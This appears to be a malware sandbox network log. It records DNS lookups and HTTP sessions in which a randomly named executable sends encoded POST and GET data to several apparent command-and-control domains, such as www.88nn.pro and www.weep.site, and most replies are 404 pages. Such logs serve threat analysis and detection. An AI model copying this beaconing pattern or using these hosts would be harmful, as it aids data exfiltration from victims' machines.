            Sep 2, 2024 09:10:09.011676073 CEST1.1.1.1192.168.2.60x5bfNo error (0)www.anaidittrich.com162.55.254.209A (IP address)IN (0x0001)false
            • www.weep.site
            • www.88nn.pro
            • www.fontanerourgente.net
            • www.onlytradez.club
            • www.32wxd.top
            • www.jaxo.xyz
            • www.xforum.tech
            • www.cannulafactory.top
            • www.ayypromo.shop
            • www.anaidittrich.com
            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            0192.168.2.649719194.233.65.154802580C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exe
            TimestampBytes transferredDirectionData
            Sep 2, 2024 09:07:55.337939024 CEST500OUTGET /v1m8/?cLqL3H=MbosJJuAq5eUJ0hPiGjwIN1TLoIAcga9hjG8r0T6YD1U+30HrEc2VhBeVjG8H8kt/NUkGofbq5WDcsdH4YqjssfFBuX2F/io1ZFH4zFtNPAFxgqhGgKh1aBi0mxPguqsni1l53c=&rZwP=sHyxifGPIFN HTTP/1.1
            Host: www.weep.site
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en;q=0.5
            Connection: close
            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Sep 2, 2024 09:07:56.254003048 CEST1236INHTTP/1.1 404 Not Found
            Date: Mon, 02 Sep 2024 07:07:56 GMT
            Server: Apache
            Accept-Ranges: bytes
            Cache-Control: no-cache, no-store, must-revalidate
            Pragma: no-cache
            Expires: 0
            Connection: close
            Transfer-Encoding: chunked
            Content-Type: text/html
            Data Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 [TRUNCATED]
            Data Ascii: 111157<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>34041 9Not Found1fca</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CC
            Sep 2, 2024 09:07:56.254030943 CEST1236INData Raw: 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20
            Data Ascii: CCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000;
            Sep 2, 2024 09:07:56.254046917 CEST448INData Raw: 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 75 6c 20 6c 69 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 69 6d 61 67 65 20
            Data Ascii: itional-info-items ul li { width: 100%; } .info-image { padding: 10px; } .info-heading { font-weight: bold; text-align: left; word-break: break-all;
            Sep 2, 2024 09:07:56.254177094 CEST1236INData Raw: 20 61 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 66 6f 6f 74 65 72 20 61 20 69 6d 67 20 7b 0a 20 20 20 20 20 20 20 20 20
            Data Ascii: a { text-decoration: none; } footer a img { border: 0; } .copyright { font-size: 10px; color: #3F4143; } @media (min-width: 768px) { .
            Sep 2, 2024 09:07:56.254192114 CEST1236INData Raw: 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b
            Data Ascii: 10px; } .status-reason { display: inline; } } @media (min-width: 992px) { .additional-info { background-image: url(data:image/png;base64,iVBORw0KG
            Sep 2, 2024 09:07:56.254221916 CEST448INData Raw: 49 46 6c 35 2f 78 61 45 39 61 71 51 47 53 44 36 62 78 49 30 52 5a 53 77 33 75 75 46 30 59 6a 51 48 65 70 6a 4d 78 48 6d 64 39 49 67 43 31 4e 62 59 31 56 53 6b 64 65 42 34 76 58 4d 48 30 4b 53 51 56 49 76 51 66 45 52 63 69 4d 70 63 61 46 74 57 34
            Data Ascii: IFl5/xaE9aqQGSD6bxI0RZSw3uuF0YjQHepjMxHmd9IgC1NbY1VSkdeB4vXMH0KSQVIvQfERciMpcaFtW4H8iI0gB2MzfEcV3gB+IkfDtbyCATgtHB7l3TrKUG2yWOe7O2KYQIPE7xFD12Yvy6SvqoLOMf95k+BvgqogCFCx22NdltO1epYc7ycEKSaI9+UAYPGOlKDQYyxDP9Npqv0NKZkS7GuNRQig5pvaYQwdTztjRnCrr/l
            Sep 2, 2024 09:07:56.254245043 CEST1236INData Raw: 49 39 63 63 48 52 43 64 78 55 65 59 61 6e 46 70 51 4a 4d 42 55 44 49 46 78 77 31 63 68 4a 69 42 41 6f 6d 6b 7a 33 78 34 33 6c 2b 6e 75 57 47 6d 57 68 6b 51 73 30 61 36 59 37 59 48 56 65 37 37 32 6d 31 74 5a 6c 55 42 45 68 4b 49 39 6b 36 6e 75 4c
            Data Ascii: I9ccHRCdxUeYanFpQJMBUDIFxw1chJiBAomkz3x43l+nuWGmWhkQs0a6Y7YHVe772m1tZlUBEhKI9k6nuLE8bzKVSECEHeCZSysr04qJGnTzsVxJoQwm7bPhQ7cza5ECGQGpg6TnjzmWBbU7tExkhVw36yz3HCm0qEvEZ9C7vDYZeWAQhnKkQUG/i7NDnCL/hwbvJr6miPKHTaOE54xpBGrl8RIXKX1bk3+A1aUhHxUte3sHEvN
            Sep 2, 2024 09:07:56.254260063 CEST1236INData Raw: 33 51 46 59 51 49 52 63 49 33 43 71 32 5a 4e 6b 33 74 59 64 75 75 6e 50 78 49 70 75 73 38 4a 6f 4c 69 35 65 31 75 32 79 57 4e 31 6b 78 64 33 55 56 39 56 58 41 64 76 6e 6a 6e 74 49 6b 73 68 31 56 33 42 53 65 2f 44 49 55 49 48 42 64 52 43 4d 4d 56
            Data Ascii: 3QFYQIRcI3Cq2ZNk3tYduunPxIpus8JoLi5e1u2yWN1kxd3UV9VXAdvnjntIksh1V3BSe/DIUIHBdRCMMV6OnHrtW3bxc8VJVmPQ+IFQmbtyUgejem6VszwaNJ5IQT9r8AUF04/DoMI+Nh1ZW5M4chJ5yuNRMAnv7Th0PwP74pTl9UjPZ8Gj19PYSn0S1FQG2VfGvSPqxrp52mBN6I25n2CTBOORE0/6GiVn9YNf8bFBd4RURFl
            Sep 2, 2024 09:07:56.254276991 CEST485INData Raw: 62 63 6e 78 70 68 49 45 50 50 6e 68 58 63 39 58 6b 52 4e 75 48 68 33 43 77 38 4a 58 74 65 65 43 56 37 5a 6a 67 2f 77 75 61 38 59 47 6c 33 58 76 44 55 50 79 2f 63 2f 41 76 64 34 2f 68 4e 44 53 71 65 67 51 41 41 41 41 42 4a 52 55 35 45 72 6b 4a 67
            Data Ascii: bcnxphIEPPnhXc9XkRNuHh3Cw8JXteeCV7Zjg/wua8YGl3XvDUPy/c/Avd4/hNDSqegQAAAABJRU5ErkJggg==); } .container { width: 70%; } .status-code { font-size: 900%; }
            Sep 2, 2024 09:07:56.254823923 CEST1236INData Raw: 33 37 0d 0a 34 30 34 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 22 3e 0d 0a 38 38 0d 0a 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 70 61 6e 3e 0a
            Data Ascii: 37404</span> <span class="status-reason">88Not Found</span> </section> <section class="contact-info"> Please forward this error screen to 20www.weep.site's <a href="mailto:38
            Sep 2, 2024 09:07:56.255165100 CEST772INData Raw: 67 71 68 47 67 4b 68 31 61 42 69 30 6d 78 50 67 75 71 73 6e 69 31 6c 35 33 63 3d 26 61 6d 70 3b 72 5a 77 50 3d 73 48 79 78 69 66 47 50 49 46 4e 20 28 70 6f 72 74 20 0d 0a 32 0d 0a 38 30 0d 0a 37 33 0d 0a 29 0a 20 20 20 20 20 20 20 20 20 20 20 20
            Data Ascii: gqhGgKh1aBi0mxPguqsni1l53c=&amp;rZwP=sHyxifGPIFN (port 28073) </div> </li> <li class="info-server">107</li> </ul> </div


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            1192.168.2.64972145.157.69.194802580C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exe
            TimestampBytes transferredDirectionData
            Sep 2, 2024 09:08:11.335092068 CEST743OUTPOST /l4rw/ HTTP/1.1
            Host: www.88nn.pro
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en;q=0.5
            Accept-Encoding: gzip, deflate
            Origin: http://www.88nn.pro
            Referer: http://www.88nn.pro/l4rw/
            Cache-Control: max-age=0
            Connection: close
            Content-Length: 211
            Content-Type: application/x-www-form-urlencoded
            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Data Raw: 63 4c 71 4c 33 48 3d 55 56 6c 77 70 32 61 49 39 4a 7a 4c 58 6c 74 31 64 50 34 4e 31 76 6e 2b 34 50 68 78 51 46 55 51 31 78 6e 73 58 47 30 59 2b 2b 4a 68 70 42 2b 50 31 4b 4e 47 55 62 71 33 70 56 37 65 72 4e 69 36 68 30 71 4c 74 2b 4f 6b 48 38 33 55 45 6b 30 48 34 38 57 45 30 2b 6b 52 51 53 34 52 56 6e 4e 43 67 36 53 74 36 6f 49 45 4e 32 52 57 4a 5a 52 5a 54 4e 49 7a 38 6e 5a 41 62 4a 63 77 38 59 78 59 51 41 64 70 42 6a 2b 4e 4c 52 42 61 41 43 4e 46 34 75 34 78 43 30 70 4b 70 72 72 78 2f 79 61 58 6b 69 47 68 4a 53 4e 72 53 36 6b 49 6d 7a 30 76 65 48 56 30 36 2f 46 6b 51 35 62 32 37 73 66 34 66 41 62 42 6d 34 71 53 4c 47 35 4d
            Data Ascii: cLqL3H=UVlwp2aI9JzLXlt1dP4N1vn+4PhxQFUQ1xnsXG0Y++JhpB+P1KNGUbq3pV7erNi6h0qLt+OkH83UEk0H48WE0+kRQS4RVnNCg6St6oIEN2RWJZRZTNIz8nZAbJcw8YxYQAdpBj+NLRBaACNF4u4xC0pKprrx/yaXkiGhJSNrS6kImz0veHV06/FkQ5b27sf4fAbBm4qSLG5M
            Sep 2, 2024 09:08:12.182842016 CEST302INHTTP/1.1 404 Not Found
            Server: nginx
            Date: Mon, 02 Sep 2024 07:08:12 GMT
            Content-Type: text/html
            Content-Length: 138
            Connection: close
            ETag: "667cd175-8a"
            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            2192.168.2.64972345.157.69.194802580C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exe
            TimestampBytes transferredDirectionData
            Sep 2, 2024 09:08:13.880590916 CEST767OUTPOST /l4rw/ HTTP/1.1
            Host: www.88nn.pro
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en;q=0.5
            Accept-Encoding: gzip, deflate
            Origin: http://www.88nn.pro
            Referer: http://www.88nn.pro/l4rw/
            Cache-Control: max-age=0
            Connection: close
            Content-Length: 235
            Content-Type: application/x-www-form-urlencoded
            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Data Raw: 63 4c 71 4c 33 48 3d 55 56 6c 77 70 32 61 49 39 4a 7a 4c 56 45 64 31 4f 6f 6b 4e 7a 50 6e 2f 79 76 68 78 47 31 56 58 31 78 6a 73 58 44 45 32 39 4e 39 68 70 67 4f 50 6e 62 4e 47 56 62 71 33 6d 31 36 56 76 4e 69 39 68 30 6d 39 74 37 75 6b 48 38 7a 55 45 6c 6b 48 34 76 4f 48 31 75 6b 70 49 69 34 54 61 48 4e 43 67 36 53 74 36 6f 4e 70 4e 32 70 57 4b 70 68 5a 56 70 55 30 78 48 5a 66 50 5a 63 77 72 49 78 63 51 41 63 45 42 69 7a 46 4c 54 4a 61 41 48 78 46 35 2f 34 79 4d 45 70 4d 6b 4c 71 43 78 52 6e 2b 74 6a 7a 42 47 7a 4e 62 50 4c 41 74 71 6c 31 31 43 30 56 58 6f 76 6c 6d 51 37 44 45 37 4d 66 53 64 41 6a 42 30 76 6d 31 45 79 63 76 4a 4c 61 49 43 76 31 6e 6b 73 56 5a 62 47 31 47 6c 47 6c 2b 42 41 3d 3d
            Data Ascii: cLqL3H=UVlwp2aI9JzLVEd1OokNzPn/yvhxG1VX1xjsXDE29N9hpgOPnbNGVbq3m16VvNi9h0m9t7ukH8zUElkH4vOH1ukpIi4TaHNCg6St6oNpN2pWKphZVpU0xHZfPZcwrIxcQAcEBizFLTJaAHxF5/4yMEpMkLqCxRn+tjzBGzNbPLAtql11C0VXovlmQ7DE7MfSdAjB0vm1EycvJLaICv1nksVZbG1GlGl+BA==
            Sep 2, 2024 09:08:14.765332937 CEST302INHTTP/1.1 404 Not Found
            Server: nginx
            Date: Mon, 02 Sep 2024 07:08:14 GMT
            Content-Type: text/html
            Content-Length: 138
            Connection: close
            ETag: "667cd175-8a"
            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            3192.168.2.64972445.157.69.194802580C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exe
            TimestampBytes transferredDirectionData
            Sep 2, 2024 09:08:16.424971104 CEST1780OUTPOST /l4rw/ HTTP/1.1
            Host: www.88nn.pro
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en;q=0.5
            Accept-Encoding: gzip, deflate
            Origin: http://www.88nn.pro
            Referer: http://www.88nn.pro/l4rw/
            Cache-Control: max-age=0
            Connection: close
            Content-Length: 1247
            Content-Type: application/x-www-form-urlencoded
            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Data Raw: 63 4c 71 4c 33 48 3d 55 56 6c 77 70 32 61 49 39 4a 7a 4c 56 45 64 31 4f 6f 6b 4e 7a 50 6e 2f 79 76 68 78 47 31 56 58 31 78 6a 73 58 44 45 32 39 4d 46 68 70 53 57 50 31 6f 6c 47 53 62 71 33 76 56 36 57 76 4e 6a 68 68 77 43 68 74 37 71 72 48 2b 37 55 4c 6e 38 48 76 75 4f 48 38 75 6b 70 42 43 34 51 56 6e 4e 54 67 36 43 78 36 70 39 70 4e 32 70 57 4b 72 35 5a 43 74 49 30 69 58 5a 41 62 4a 63 38 38 59 78 30 51 41 55 36 42 69 6e 56 4c 6a 70 61 41 6d 42 46 36 4a 6b 79 4f 6b 70 4f 6e 4c 71 61 78 52 72 6c 74 6a 66 37 47 7a 34 54 50 4b 34 74 6f 67 63 42 59 67 42 2f 38 76 70 72 46 35 2f 31 31 61 54 4e 52 54 66 4e 33 38 47 37 4e 68 45 6a 4d 4d 62 4c 58 6f 64 6c 6c 50 5a 76 5a 69 45 5a 72 6b 38 69 58 31 68 4d 31 4d 38 47 31 52 37 75 32 47 6a 65 6a 4a 53 56 4a 30 71 48 2f 66 38 79 79 37 49 7a 64 37 36 79 37 68 7a 38 33 70 49 69 74 31 4d 71 68 49 48 50 67 42 59 66 5a 54 57 4e 6e 38 34 36 79 67 32 56 2f 2f 48 6b 32 34 55 4a 38 69 67 65 67 4a 5a 4b 39 6b 4f 53 68 71 58 6c 58 65 36 38 63 37 47 76 79 42 71 7a 69 57 44 [TRUNCATED]
            Data Ascii: cLqL3H=UVlwp2aI9JzLVEd1OokNzPn/yvhxG1VX1xjsXDE29MFhpSWP1olGSbq3vV6WvNjhhwCht7qrH+7ULn8HvuOH8ukpBC4QVnNTg6Cx6p9pN2pWKr5ZCtI0iXZAbJc88Yx0QAU6BinVLjpaAmBF6JkyOkpOnLqaxRrltjf7Gz4TPK4togcBYgB/8vprF5/11aTNRTfN38G7NhEjMMbLXodllPZvZiEZrk8iX1hM1M8G1R7u2GjejJSVJ0qH/f8yy7Izd76y7hz83pIit1MqhIHPgBYfZTWNn846yg2V//Hk24UJ8igegJZK9kOShqXlXe68c7GvyBqziWDu6rAEf8hSygzk2RILwYJlyV2uStBNTXz3zd9jrJlyZPLbXSdkyADFeDcst9al+VQi8ffNkP00VejnzCQpgAMLxBF2xSsh4uv9VYXugPVo4KYFfBZxTHx3uHp2ivEd8Q+QpIu1O6qG6iG1ZNw+fxuOMGS9+i7IW/cuuWuZ+4Bby5z6dJ4hvrEr4wLTAVTwj4/KigfxlnTWgXDW5JUIYSEQTuMq54kanqu+paObi0B8mtyCCpBjGPbKyPvyoLB452SdrpEqg4Vevtlbsyb1mDonml51WiMKB3jT5wEsGWDpA77eEeBgdDgo3lBL8uM7WoduylNpKudLThZXBF/YmvYTGP5HDyKNdwVvGSWRICauJSByi0eQ+a2LELYVsX6k+VH/5cbpnlozXN9J6ilYNYD2lDi54c/QRDKqAQ8QyvztfeNidMqpWi8JcYvQYnyUCE1kJnX/HbsLBM5GLm4gk0RrLFQRTcneN8jdyIuq2VRS2tNNQzGYxJ5EA7zRcTlTyLnOshS4ZrNCzFi21VZK/0J83B79qjvucdSlrFw7XX6FWxRAmnt3LKaWKXEZsBjYUusVqZv9UJWK97TQhWPeVuzIY8qLCSzySs8WbzhQs094T9qRIe+hTLqK/GJOndSZLOeZL4vchWvqE83efrTpZD7H/wkKIskMAoVUe [TRUNCATED]
            Sep 2, 2024 09:08:17.528681040 CEST302INHTTP/1.1 404 Not Found
            Server: nginx
            Date: Mon, 02 Sep 2024 07:08:17 GMT
            Content-Type: text/html
            Content-Length: 138
            Connection: close
            ETag: "667cd175-8a"
            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            4192.168.2.64972545.157.69.194802580C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exe
            TimestampBytes transferredDirectionData
            Sep 2, 2024 09:08:18.967560053 CEST499OUTGET /l4rw/?cLqL3H=ZXNQqBP58JXIf3ltP6wut8CCjedJLF5l9UucInMS2YFRqgKt0pQ9Lq2gj3LI6pyb9XKzluqnMvvmNnss5NGj4J8VLwdTZn5p64yovrdSdmFXVLBYTbU+6U99coUT9vxRPQh+Kno=&rZwP=sHyxifGPIFN HTTP/1.1
            Host: www.88nn.pro
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en;q=0.5
            Connection: close
            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Sep 2, 2024 09:08:19.838300943 CEST302INHTTP/1.1 404 Not Found
            Server: nginx
            Date: Mon, 02 Sep 2024 07:08:19 GMT
            Content-Type: text/html
            Content-Length: 138
            Connection: close
            ETag: "667cd175-8a"
            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            5192.168.2.64972637.187.158.211802580C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exe
            TimestampBytes transferredDirectionData
            Sep 2, 2024 09:08:24.951453924 CEST779OUTPOST /t3gh/ HTTP/1.1
            Host: www.fontanerourgente.net
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en;q=0.5
            Accept-Encoding: gzip, deflate
            Origin: http://www.fontanerourgente.net
            Referer: http://www.fontanerourgente.net/t3gh/
            Cache-Control: max-age=0
            Connection: close
            Content-Length: 211
            Content-Type: application/x-www-form-urlencoded
            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Data Raw: 63 4c 71 4c 33 48 3d 51 39 77 6e 59 55 52 7a 78 77 6a 6e 6d 69 66 6c 69 44 55 77 78 65 54 72 47 70 69 62 78 67 63 58 61 38 6e 65 53 49 35 57 6d 44 6c 54 4d 30 77 50 55 78 67 4a 66 4c 72 69 35 43 74 77 4b 69 30 37 73 4b 7a 4d 6c 39 7a 31 43 55 61 32 62 4a 4a 4b 57 2b 31 6e 70 53 56 33 2b 79 44 6b 34 49 6e 66 74 6d 5a 2f 70 62 78 66 79 4a 72 72 6f 71 62 46 5a 70 65 62 59 36 34 4c 69 4b 71 57 44 54 50 56 4a 73 58 64 52 4e 33 66 42 66 70 79 6c 35 66 42 35 54 36 47 47 39 6b 6b 31 39 6f 74 74 57 4f 6c 75 30 4b 6b 38 44 48 30 37 2f 4e 63 47 39 77 71 6b 68 34 52 42 70 65 79 62 39 64 79 35 6e 4d 41 74 50 39 45 4d 51 49 2b 6f 2b 53 41
            Data Ascii: cLqL3H=Q9wnYURzxwjnmifliDUwxeTrGpibxgcXa8neSI5WmDlTM0wPUxgJfLri5CtwKi07sKzMl9z1CUa2bJJKW+1npSV3+yDk4InftmZ/pbxfyJrroqbFZpebY64LiKqWDTPVJsXdRN3fBfpyl5fB5T6GG9kk19ottWOlu0Kk8DH07/NcG9wqkh4RBpeyb9dy5nMAtP9EMQI+o+SA
            Sep 2, 2024 09:08:25.792175055 CEST1236INHTTP/1.1 404 Not Found
            Date: Mon, 02 Sep 2024 07:08:25 GMT
            Server: Apache
            Expires: Wed, 11 Jan 1984 05:00:00 GMT
            Cache-Control: no-cache, must-revalidate, max-age=0
            Link: <https://mgmasistencia.com/wp-json/>; rel="https://api.w.org/"
            Connection: close
            Transfer-Encoding: chunked
            Content-Type: text/html; charset=UTF-8
            Data Raw: 31 63 65 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 26 23 38 32 31 31 3b 20 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 [TRUNCATED]
